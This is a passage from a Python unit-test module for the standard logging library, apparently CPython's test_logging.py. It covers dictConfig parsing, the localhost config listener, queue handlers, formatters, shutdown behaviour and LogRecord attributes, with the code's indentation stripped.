'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config11 but using an unsupported version
config13 = {
'version': 2,
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config0, but with properties
config14 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'.': {
'foo': 'bar',
'terminator': '!\n',
}
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
out_of_order = {
"version": 1,
"formatters": {
"mySimpleFormatter": {
"format": "%(asctime)s (%(name)s) %(levelname)s: %(message)s",
"style": "$"
}
},
"handlers": {
"fileGlobal": {
"class": "logging.StreamHandler",
"level": "DEBUG",
"formatter": "mySimpleFormatter"
},
"bufferGlobal": {
"class": "logging.handlers.MemoryHandler",
"capacity": 5,
"formatter": "mySimpleFormatter",
"target": "fileGlobal",
"level": "DEBUG"
}
},
"loggers": {
"mymodule": {
"level": "DEBUG",
"handlers": ["bufferGlobal"],
"propagate": "true"
}
}
}
def apply_config(self, conf):
logging.config.dictConfig(conf)
def test_config0_ok(self):
# A simple config which overrides the default settings.
with support.captured_stdout() as output:
self.apply_config(self.config0)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config1_ok(self, config=config1):
# A config defining a sub-parser as well.
with support.captured_stdout() as output:
self.apply_config(config)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config2_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2)
def test_config2a_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2a)
def test_config2b_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2b)
def test_config3_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config3)
def test_config4_ok(self):
# A config specifying a custom formatter class.
with support.captured_stdout() as output:
self.apply_config(self.config4)
#logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config4a_ok(self):
# A config specifying a custom formatter class.
with support.captured_stdout() as output:
self.apply_config(self.config4a)
#logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config5_ok(self):
self.test_config1_ok(config=self.config5)
def test_config6_failure(self):
self.assertRaises(Exception, self.apply_config, self.config6)
def test_config7_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config7)
logger = logging.getLogger("compiler.parser")
self.assertTrue(logger.disabled)
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
# Same as test_config_7_ok but don't disable old loggers.
def test_config_8_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1)
logger = logging.getLogger("compiler.parser")
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config8)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
('INFO', '5'),
('ERROR', '6'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config_8a_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1a)
logger = logging.getLogger("compiler.parser")
# See issue #11424. compiler-hyphenated sorts
# between compiler and compiler.xyz and this
# was preventing compiler.xyz from being included
# in the child loggers of compiler because of an
# overzealous loop termination condition.
hyphenated = logging.getLogger('compiler-hyphenated')
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
('CRITICAL', '3'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config8a)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
# Will not appear
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '4'),
('ERROR', '5'),
('INFO', '6'),
('ERROR', '7'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config_9_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config9)
logger = logging.getLogger("compiler.parser")
# Nothing will be output since both handler and logger are set to WARNING
logger.info(self.next_message())
self.assert_log_lines([], stream=output)
self.apply_config(self.config9a)
# Nothing will be output since handler is still set to WARNING
logger.info(self.next_message())
self.assert_log_lines([], stream=output)
self.apply_config(self.config9b)
# Message should now be output
logger.info(self.next_message())
self.assert_log_lines([
('INFO', '3'),
], stream=output)
def test_config_10_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config10)
logger = logging.getLogger("compiler.parser")
logger.warning(self.next_message())
logger = logging.getLogger('compiler')
# Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger('compiler.lexer')
# Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger("compiler.parser.codegen")
# Output, as not filtered
logger.error(self.next_message())
self.assert_log_lines([
('WARNING', '1'),
('ERROR', '4'),
], stream=output)
def test_config11_ok(self):
self.test_config1_ok(self.config11)
def test_config12_failure(self):
self.assertRaises(Exception, self.apply_config, self.config12)
def test_config13_failure(self):
self.assertRaises(Exception, self.apply_config, self.config13)
def test_config14_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config14)
h = logging._handlers['hand1']
self.assertEqual(h.foo, 'bar')
self.assertEqual(h.terminator, '!\n')
logging.warning('Exclamation')
self.assertTrue(output.getvalue().endswith('Exclamation!\n'))
def test_config15_ok(self):
def cleanup(h1, fn):
h1.close()
os.remove(fn)
with self.check_no_resource_warning():
fd, fn = tempfile.mkstemp(".log", "test_logging-X-")
os.close(fd)
config = {
"version": 1,
"handlers": {
"file": {
"class": "logging.FileHandler",
"filename": fn
}
},
"root": {
"handlers": ["file"]
}
}
self.apply_config(config)
self.apply_config(config)
handler = logging.root.handlers[0]
self.addCleanup(cleanup, handler, fn)
@unittest.skipUnless(threading, 'listen() needs threading to work')
def setup_via_listener(self, text, verify=None):
text = text.encode("utf-8")
# Ask for a randomly assigned port (by using port 0)
t = logging.config.listen(0, verify)
t.start()
t.ready.wait()
# Now get the port allocated
port = t.port
t.ready.clear()
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(2.0)
sock.connect(('localhost', port))
slen = struct.pack('>L', len(text))
s = slen + text
sentsofar = 0
left = len(s)
while left > 0:
sent = sock.send(s[sentsofar:])
sentsofar += sent
left -= sent
sock.close()
finally:
t.ready.wait(2.0)
logging.config.stopListening()
t.join(2.0)
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_listen_config_10_ok(self):
with support.captured_stdout() as output:
self.setup_via_listener(json.dumps(self.config10))
logger = logging.getLogger("compiler.parser")
logger.warning(self.next_message())
logger = logging.getLogger('compiler')
# Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger('compiler.lexer')
# Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger("compiler.parser.codegen")
# Output, as not filtered
logger.error(self.next_message())
self.assert_log_lines([
('WARNING', '1'),
('ERROR', '4'),
], stream=output)
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_listen_config_1_ok(self):
with support.captured_stdout() as output:
self.setup_via_listener(textwrap.dedent(ConfigFileTest.config1))
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_listen_verify(self):
def verify_fail(stuff):
return None
def verify_reverse(stuff):
return stuff[::-1]
logger = logging.getLogger("compiler.parser")
to_send = textwrap.dedent(ConfigFileTest.config1)
# First, specify a verification function that will fail.
# We expect to see no output, since our configuration
# never took effect.
with support.captured_stdout() as output:
self.setup_via_listener(to_send, verify_fail)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([], stream=output)
# Original logger output has the stuff we logged.
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], pat=r"^[\w.]+ -> (\w+): (\d+)$")
# Now, perform no verification. Our configuration
# should take effect.
with support.captured_stdout() as output:
self.setup_via_listener(to_send) # no verify callable specified
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
], stream=output)
# Original logger output still has the stuff we logged before.
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], pat=r"^[\w.]+ -> (\w+): (\d+)$")
# Now, perform verification which transforms the bytes.
with support.captured_stdout() as output:
self.setup_via_listener(to_send[::-1], verify_reverse)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '5'),
('ERROR', '6'),
], stream=output)
# Original logger output still has the stuff we logged before.
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], pat=r"^[\w.]+ -> (\w+): (\d+)$")
def test_out_of_order(self):
self.apply_config(self.out_of_order)
handler = logging.getLogger('mymodule').handlers[0]
self.assertIsInstance(handler.target, logging.Handler)
self.assertIsInstance(handler.formatter._style,
logging.StringTemplateStyle)
def test_baseconfig(self):
d = {
'atuple': (1, 2, 3),
'alist': ['a', 'b', 'c'],
'adict': {'d': 'e', 'f': 3 },
'nest1': ('g', ('h', 'i'), 'j'),
'nest2': ['k', ['l', 'm'], 'n'],
'nest3': ['o', 'cfg://alist', 'p'],
}
bc = logging.config.BaseConfigurator(d)
self.assertEqual(bc.convert('cfg://atuple[1]'), 2)
self.assertEqual(bc.convert('cfg://alist[1]'), 'b')
self.assertEqual(bc.convert('cfg://nest1[1][0]'), 'h')
self.assertEqual(bc.convert('cfg://nest2[1][1]'), 'm')
self.assertEqual(bc.convert('cfg://adict.d'), 'e')
self.assertEqual(bc.convert('cfg://adict[f]'), 3)
v = bc.convert('cfg://nest3')
self.assertEqual(v.pop(1), ['a', 'b', 'c'])
self.assertRaises(KeyError, bc.convert, 'cfg://nosuch')
self.assertRaises(ValueError, bc.convert, 'cfg://!')
self.assertRaises(KeyError, bc.convert, 'cfg://adict[2]')
class ManagerTest(BaseTest):
def test_manager_loggerclass(self):
logged = []
class MyLogger(logging.Logger):
def _log(self, level, msg, args, exc_info=None, extra=None):
logged.append(msg)
man = logging.Manager(None)
self.assertRaises(TypeError, man.setLoggerClass, int)
man.setLoggerClass(MyLogger)
logger = man.getLogger('test')
logger.warning('should appear in logged')
logging.warning('should not appear in logged')
self.assertEqual(logged, ['should appear in logged'])
def test_set_log_record_factory(self):
man = logging.Manager(None)
expected = object()
man.setLogRecordFactory(expected)
self.assertEqual(man.logRecordFactory, expected)
class ChildLoggerTest(BaseTest):
def test_child_loggers(self):
r = logging.getLogger()
l1 = logging.getLogger('abc')
l2 = logging.getLogger('def.ghi')
c1 = r.getChild('xyz')
c2 = r.getChild('uvw.xyz')
self.assertIs(c1, logging.getLogger('xyz'))
self.assertIs(c2, logging.getLogger('uvw.xyz'))
c1 = l1.getChild('def')
c2 = c1.getChild('ghi')
c3 = l1.getChild('def.ghi')
self.assertIs(c1, logging.getLogger('abc.def'))
self.assertIs(c2, logging.getLogger('abc.def.ghi'))
self.assertIs(c2, c3)
class DerivedLogRecord(logging.LogRecord):
pass
class LogRecordFactoryTest(BaseTest):
def setUp(self):
class CheckingFilter(logging.Filter):
def __init__(self, cls):
self.cls = cls
def filter(self, record):
t = type(record)
if t is not self.cls:
msg = 'Unexpected LogRecord type %s, expected %s' % (t,
self.cls)
raise TypeError(msg)
return True
BaseTest.setUp(self)
self.filter = CheckingFilter(DerivedLogRecord)
self.root_logger.addFilter(self.filter)
self.orig_factory = logging.getLogRecordFactory()
def tearDown(self):
self.root_logger.removeFilter(self.filter)
BaseTest.tearDown(self)
logging.setLogRecordFactory(self.orig_factory)
def test_logrecord_class(self):
self.assertRaises(TypeError, self.root_logger.warning,
self.next_message())
logging.setLogRecordFactory(DerivedLogRecord)
self.root_logger.error(self.next_message())
self.assert_log_lines([
('root', 'ERROR', '2'),
])
class QueueHandlerTest(BaseTest):
# Do not bother with a logger name group.
expected_log_pat = r"^[\w.]+ -> (\w+): (\d+)$"
def setUp(self):
BaseTest.setUp(self)
self.queue = queue.Queue(-1)
self.que_hdlr = logging.handlers.QueueHandler(self.queue)
self.que_logger = logging.getLogger('que')
self.que_logger.propagate = False
self.que_logger.setLevel(logging.WARNING)
self.que_logger.addHandler(self.que_hdlr)
def tearDown(self):
self.que_hdlr.close()
BaseTest.tearDown(self)
def test_queue_handler(self):
self.que_logger.debug(self.next_message())
self.assertRaises(queue.Empty, self.queue.get_nowait)
self.que_logger.info(self.next_message())
self.assertRaises(queue.Empty, self.queue.get_nowait)
msg = self.next_message()
self.que_logger.warning(msg)
data = self.queue.get_nowait()
self.assertTrue(isinstance(data, logging.LogRecord))
self.assertEqual(data.name, self.que_logger.name)
self.assertEqual((data.msg, data.args), (msg, None))
@unittest.skipUnless(False and hasattr(logging.handlers, 'QueueListener'),
'logging.handlers.QueueListener required for this test')
def test_queue_listener(self): # TODO add QueueListener after threading
handler = support.TestHandler(support.Matcher())
listener = logging.handlers.QueueListener(self.queue, handler)
listener.start()
try:
self.que_logger.warning(self.next_message())
self.que_logger.error(self.next_message())
self.que_logger.critical(self.next_message())
finally:
listener.stop()
self.assertTrue(handler.matches(levelno=logging.WARNING, message='1'))
self.assertTrue(handler.matches(levelno=logging.ERROR, message='2'))
self.assertTrue(handler.matches(levelno=logging.CRITICAL, message='3'))
handler.close()
# Now test with respect_handler_level set
handler = support.TestHandler(support.Matcher())
handler.setLevel(logging.CRITICAL)
listener = logging.handlers.QueueListener(self.queue, handler,
respect_handler_level=True)
listener.start()
try:
self.que_logger.warning(self.next_message())
self.que_logger.error(self.next_message())
self.que_logger.critical(self.next_message())
finally:
listener.stop()
self.assertFalse(handler.matches(levelno=logging.WARNING, message='4'))
self.assertFalse(handler.matches(levelno=logging.ERROR, message='5'))
self.assertTrue(handler.matches(levelno=logging.CRITICAL, message='6'))
if False and hasattr(logging.handlers, 'QueueListener'):
import multiprocessing
from unittest.mock import patch
class QueueListenerTest(BaseTest):
"""
Tests based on patch submitted for issue #27930. Ensure that
QueueListener handles all log messages.
"""
repeat = 20
@staticmethod
def setup_and_log(log_queue, ident):
"""
Creates a logger with a QueueHandler that logs to a queue read by a
QueueListener. Starts the listener, logs five messages, and stops
the listener.
"""
logger = logging.getLogger('test_logger_with_id_%s' % ident)
logger.setLevel(logging.DEBUG)
handler = logging.handlers.QueueHandler(log_queue)
logger.addHandler(handler)
listener = logging.handlers.QueueListener(log_queue)
listener.start()
logger.info('one')
logger.info('two')
logger.info('three')
logger.info('four')
logger.info('five')
listener.stop()
logger.removeHandler(handler)
handler.close()
@patch.object(logging.handlers.QueueListener, 'handle')
@support.reap_threads
def test_handle_called_with_queue_queue(self, mock_handle):
for i in range(self.repeat):
log_queue = queue.Queue()
self.setup_and_log(log_queue, '%s_%s' % (self.id(), i))
self.assertEqual(mock_handle.call_count, 5 * self.repeat,
'correct number of handled log messages')
@support.requires_multiprocessing_queue
@patch.object(logging.handlers.QueueListener, 'handle')
@support.reap_threads
def test_handle_called_with_mp_queue(self, mock_handle):
for i in range(self.repeat):
log_queue = multiprocessing.Queue()
self.setup_and_log(log_queue, '%s_%s' % (self.id(), i))
log_queue.close()
log_queue.join_thread()
self.assertEqual(mock_handle.call_count, 5 * self.repeat,
'correct number of handled log messages')
@staticmethod
def get_all_from_queue(log_queue):
try:
while True:
yield log_queue.get_nowait()
except queue.Empty:
return []
@support.requires_multiprocessing_queue
@support.reap_threads
def test_no_messages_in_queue_after_stop(self):
"""
Five messages are logged then the QueueListener is stopped. This
test then gets everything off the queue. Failure of this test
indicates that messages were not registered on the queue until
_after_ the QueueListener stopped.
"""
for i in range(self.repeat):
queue = multiprocessing.Queue()
self.setup_and_log(queue, '%s_%s' %(self.id(), i))
# time.sleep(1)
items = list(self.get_all_from_queue(queue))
queue.close()
queue.join_thread()
expected = [[], [logging.handlers.QueueListener._sentinel]]
self.assertIn(items, expected,
'Found unexpected messages in queue: %s' % (
[m.msg if isinstance(m, logging.LogRecord)
else m for m in items]))
ZERO = datetime.timedelta(0)
class UTC(datetime.tzinfo):
def utcoffset(self, dt):
return ZERO
dst = utcoffset
def tzname(self, dt):
return 'UTC'
utc = UTC()
class FormatterTest(unittest.TestCase):
def setUp(self):
self.common = {
'name': 'formatter.test',
'level': logging.DEBUG,
'pathname': os.path.join('path', 'to', 'dummy.ext'),
'lineno': 42,
'exc_info': None,
'func': None,
'msg': 'Message with %d %s',
'args': (2, 'placeholders'),
}
self.variants = {
}
def get_record(self, name=None):
result = dict(self.common)
if name is not None:
result.update(self.variants[name])
return logging.makeLogRecord(result)
def test_percent(self):
# Test %-formatting
r = self.get_record()
f = logging.Formatter('${%(message)s}')
self.assertEqual(f.format(r), '${Message with 2 placeholders}')
f = logging.Formatter('%(random)s')
self.assertRaises(KeyError, f.format, r)
self.assertFalse(f.usesTime())
f = logging.Formatter('%(asctime)s')
self.assertTrue(f.usesTime())
f = logging.Formatter('%(asctime)-15s')
self.assertTrue(f.usesTime())
f = logging.Formatter('asctime')
self.assertFalse(f.usesTime())
def test_braces(self):
# Test {}-formatting
r = self.get_record()
f = logging.Formatter('$%{message}%$', style='{')
self.assertEqual(f.format(r), '$%Message with 2 placeholders%$')
f = logging.Formatter('{random}', style='{')
self.assertRaises(KeyError, f.format, r)
self.assertFalse(f.usesTime())
f = logging.Formatter('{asctime}', style='{')
self.assertTrue(f.usesTime())
f = logging.Formatter('{asctime!s:15}', style='{')
self.assertTrue(f.usesTime())
f = logging.Formatter('{asctime:15}', style='{')
self.assertTrue(f.usesTime())
f = logging.Formatter('asctime', style='{')
self.assertFalse(f.usesTime())
def test_dollars(self):
# Test $-formatting
r = self.get_record()
f = logging.Formatter('$message', style='$')
self.assertEqual(f.format(r), 'Message with 2 placeholders')
f = logging.Formatter('$$%${message}%$$', style='$')
self.assertEqual(f.format(r), '$%Message with 2 placeholders%$')
f = logging.Formatter('${random}', style='$')
self.assertRaises(KeyError, f.format, r)
self.assertFalse(f.usesTime())
f = logging.Formatter('${asctime}', style='$')
self.assertTrue(f.usesTime())
f = logging.Formatter('${asctime', style='$')
self.assertFalse(f.usesTime())
f = logging.Formatter('$asctime', style='$')
self.assertTrue(f.usesTime())
f = logging.Formatter('asctime', style='$')
self.assertFalse(f.usesTime())
def test_invalid_style(self):
self.assertRaises(ValueError, logging.Formatter, None, None, 'x')
def test_time(self):
r = self.get_record()
dt = datetime.datetime(1993, 4, 21, 8, 3, 0, 0, utc)
# We use None to indicate we want the local timezone
# We're essentially converting a UTC time to local time
r.created = time.mktime(dt.astimezone(None).timetuple())
r.msecs = 123
f = logging.Formatter('%(asctime)s %(message)s')
f.converter = time.gmtime
self.assertEqual(f.formatTime(r), '1993-04-21 08:03:00,123')
self.assertEqual(f.formatTime(r, '%Y:%d'), '1993:21')
f.format(r)
self.assertEqual(r.asctime, '1993-04-21 08:03:00,123')
class TestBufferingFormatter(logging.BufferingFormatter):
def formatHeader(self, records):
return '[(%d)' % len(records)
def formatFooter(self, records):
return '(%d)]' % len(records)
class BufferingFormatterTest(unittest.TestCase):
def setUp(self):
self.records = [
logging.makeLogRecord({'msg': 'one'}),
logging.makeLogRecord({'msg': 'two'}),
]
def test_default(self):
f = logging.BufferingFormatter()
self.assertEqual('', f.format([]))
self.assertEqual('onetwo', f.format(self.records))
def test_custom(self):
f = TestBufferingFormatter()
self.assertEqual('[(2)onetwo(2)]', f.format(self.records))
lf = logging.Formatter('<%(message)s>')
f = TestBufferingFormatter(lf)
self.assertEqual('[(2)<one><two>(2)]', f.format(self.records))
class ExceptionTest(BaseTest):
@unittest.skipIf(cosmo.MODE == "tiny", "fails only in MODE=tiny")
def test_formatting(self):
r = self.root_logger
h = RecordingHandler()
r.addHandler(h)
try:
raise RuntimeError('deliberate mistake')
except:
logging.exception('failed', stack_info=True)
r.removeHandler(h)
h.close()
r = h.records[0]
self.assertTrue(r.exc_text.startswith('Traceback (most recent '
'call last):\n'))
self.assertTrue(r.exc_text.endswith('\nRuntimeError: '
'deliberate mistake'))
self.assertTrue(r.stack_info.startswith('Stack (most recent '
'call last):\n'))
self.assertTrue(r.stack_info.endswith('logging.exception(\'failed\', '
'stack_info=True)'))
class LastResortTest(BaseTest):
def test_last_resort(self):
# Test the last resort handler
root = self.root_logger
root.removeHandler(self.root_hdlr)
old_lastresort = logging.lastResort
old_raise_exceptions = logging.raiseExceptions
try:
with support.captured_stderr() as stderr:
root.debug('This should not appear')
self.assertEqual(stderr.getvalue(), '')
root.warning('Final chance!')
self.assertEqual(stderr.getvalue(), 'Final chance!\n')
# No handlers and no last resort, so 'No handlers' message
logging.lastResort = None
with support.captured_stderr() as stderr:
root.warning('Final chance!')
msg = 'No handlers could be found for logger "root"\n'
self.assertEqual(stderr.getvalue(), msg)
# 'No handlers' message only printed once
with support.captured_stderr() as stderr:
root.warning('Final chance!')
self.assertEqual(stderr.getvalue(), '')
# If raiseExceptions is False, no message is printed
root.manager.emittedNoHandlerWarning = False
logging.raiseExceptions = False
with support.captured_stderr() as stderr:
root.warning('Final chance!')
self.assertEqual(stderr.getvalue(), '')
finally:
root.addHandler(self.root_hdlr)
logging.lastResort = old_lastresort
logging.raiseExceptions = old_raise_exceptions
class FakeHandler:
def __init__(self, identifier, called):
for method in ('acquire', 'flush', 'close', 'release'):
setattr(self, method, self.record_call(identifier, method, called))
def record_call(self, identifier, method_name, called):
def inner():
called.append('{} - {}'.format(identifier, method_name))
return inner
class RecordingHandler(logging.NullHandler):
def __init__(self, *args, **kwargs):
super(RecordingHandler, self).__init__(*args, **kwargs)
self.records = []
def handle(self, record):
"""Keep track of all the emitted records."""
self.records.append(record)
class ShutdownTest(BaseTest):
"""Test suite for the shutdown method."""
def setUp(self):
super(ShutdownTest, self).setUp()
self.called = []
raise_exceptions = logging.raiseExceptions
self.addCleanup(setattr, logging, 'raiseExceptions', raise_exceptions)
def raise_error(self, error):
def inner():
raise error()
return inner
def test_no_failure(self):
# create some fake handlers
handler0 = FakeHandler(0, self.called)
handler1 = FakeHandler(1, self.called)
handler2 = FakeHandler(2, self.called)
# create live weakref to those handlers
handlers = map(logging.weakref.ref, [handler0, handler1, handler2])
logging.shutdown(handlerList=list(handlers))
expected = ['2 - acquire', '2 - flush', '2 - close', '2 - release',
'1 - acquire', '1 - flush', '1 - close', '1 - release',
'0 - acquire', '0 - flush', '0 - close', '0 - release']
self.assertEqual(expected, self.called)
def _test_with_failure_in_method(self, method, error):
handler = FakeHandler(0, self.called)
setattr(handler, method, self.raise_error(error))
handlers = [logging.weakref.ref(handler)]
logging.shutdown(handlerList=list(handlers))
self.assertEqual('0 - release', self.called[-1])
def test_with_ioerror_in_acquire(self):
self._test_with_failure_in_method('acquire', OSError)
def test_with_ioerror_in_flush(self):
self._test_with_failure_in_method('flush', OSError)
def test_with_ioerror_in_close(self):
self._test_with_failure_in_method('close', OSError)
def test_with_valueerror_in_acquire(self):
self._test_with_failure_in_method('acquire', ValueError)
def test_with_valueerror_in_flush(self):
self._test_with_failure_in_method('flush', ValueError)
def test_with_valueerror_in_close(self):
self._test_with_failure_in_method('close', ValueError)
def test_with_other_error_in_acquire_without_raise(self):
logging.raiseExceptions = False
self._test_with_failure_in_method('acquire', IndexError)
def test_with_other_error_in_flush_without_raise(self):
logging.raiseExceptions = False
self._test_with_failure_in_method('flush', IndexError)
def test_with_other_error_in_close_without_raise(self):
logging.raiseExceptions = False
self._test_with_failure_in_method('close', IndexError)
def test_with_other_error_in_acquire_with_raise(self):
logging.raiseExceptions = True
self.assertRaises(IndexError, self._test_with_failure_in_method,
'acquire', IndexError)
def test_with_other_error_in_flush_with_raise(self):
logging.raiseExceptions = True
self.assertRaises(IndexError, self._test_with_failure_in_method,
'flush', IndexError)
def test_with_other_error_in_close_with_raise(self):
logging.raiseExceptions = True
self.assertRaises(IndexError, self._test_with_failure_in_method,
'close', IndexError)
class ModuleLevelMiscTest(BaseTest):
"""Test suite for some module level methods."""
def test_disable(self):
old_disable = logging.root.manager.disable
# confirm our assumptions are correct
self.assertEqual(old_disable, 0)
self.addCleanup(logging.disable, old_disable)
logging.disable(83)
self.assertEqual(logging.root.manager.disable, 83)
def _test_log(self, method, level=None):
called = []
support.patch(self, logging, 'basicConfig',
lambda *a, **kw: called.append((a, kw)))
recording = RecordingHandler()
logging.root.addHandler(recording)
log_method = getattr(logging, method)
if level is not None:
log_method(level, "test me: %r", recording)
else:
log_method("test me: %r", recording)
self.assertEqual(len(recording.records), 1)
record = recording.records[0]
self.assertEqual(record.getMessage(), "test me: %r" % recording)
expected_level = level if level is not None else getattr(logging, method.upper())
self.assertEqual(record.levelno, expected_level)
# basicConfig was not called!
self.assertEqual(called, [])
def test_log(self):
self._test_log('log', logging.ERROR)
def test_debug(self):
self._test_log('debug')
def test_info(self):
self._test_log('info')
def test_warning(self):
self._test_log('warning')
def test_error(self):
self._test_log('error')
def test_critical(self):
self._test_log('critical')
def test_set_logger_class(self):
self.assertRaises(TypeError, logging.setLoggerClass, object)
class MyLogger(logging.Logger):
pass
logging.setLoggerClass(MyLogger)
self.assertEqual(logging.getLoggerClass(), MyLogger)
logging.setLoggerClass(logging.Logger)
self.assertEqual(logging.getLoggerClass(), logging.Logger)
@support.requires_type_collecting
def test_logging_at_shutdown(self):
# Issue #20037
code = """if 1:
import logging
class A:
def __del__(self):
try:
raise ValueError("some error")
except Exception:
logging.exception("exception in __del__")
a = A()"""
rc, out, err = assert_python_ok("-c", code)
err = err.decode()
self.assertIn("exception in __del__", err)
self.assertIn("ValueError: some error", err)
class LogRecordTest(BaseTest):
def test_str_rep(self):
r = logging.makeLogRecord({})
s = str(r)
self.assertTrue(s.startswith('<LogRecord: '))
self.assertTrue(s.endswith('>'))
def test_dict_arg(self):
h = RecordingHandler()
r = logging.getLogger()
r.addHandler(h)
d = {'less' : 'more' }
logging.warning('less is %(less)s', d)
self.assertIs(h.records[0].args, d)
self.assertEqual(h.records[0].message, 'less is more')
r.removeHandler(h)
h.close()
def test_multiprocessing(self):
r = logging.makeLogRecord({})
self.assertEqual(r.processName, 'MainProcess')
try:
import multiprocessing as mp
r = logging.makeLogRecord({})
self.assertEqual(r.processName, mp.current_process().name)
except ImportError:
pass
def test_optional(self):
r = logging.makeLogRecord({})
NOT_NONE = self.assertIsNotNone
if threading:
NOT_NONE(r.thread)
NOT_NONE(r.threadName)
NOT_NONE(r.process)
NOT_NONE(r.processName)
log_threads = logging.logThreads
log_processes = logging.logProcesses
log_multiprocessing = logging.logMultiprocessing
try:
logging.logThreads = False
logging.logProcesses = False
logging.logMultiprocessing = False
r = logging.makeLogRecord({})
NONE = self.assertIsNone
NONE(r.thread)
NONE(r.threadName)
NONE(r.process)
NONE(r.processName)
finally:
logging.logThreads = log_threads
logging.logProcesses = log_processes
logging.logMultiprocessing = log_multiprocessing
class BasicConfigTest(unittest.TestCase):
"""Test suite for logging.basicConfig."""
def setUp(self):
super(BasicConfigTest, self).setUp()
self.handlers = logging.root.handlers
self.saved_handlers = logging._handlers.copy()
self.saved_handler_list = logging._handlerList[:]
self.original_logging_level = logging.root.level
self.addCleanup(self.cleanup)
logging.root.handlers = []
def tearDown(self):
for h in logging.root.handlers[:]:
logging.root.removeHandler(h)
h.close()
super(BasicConfigTest, self).tearDown()
def cleanup(self):
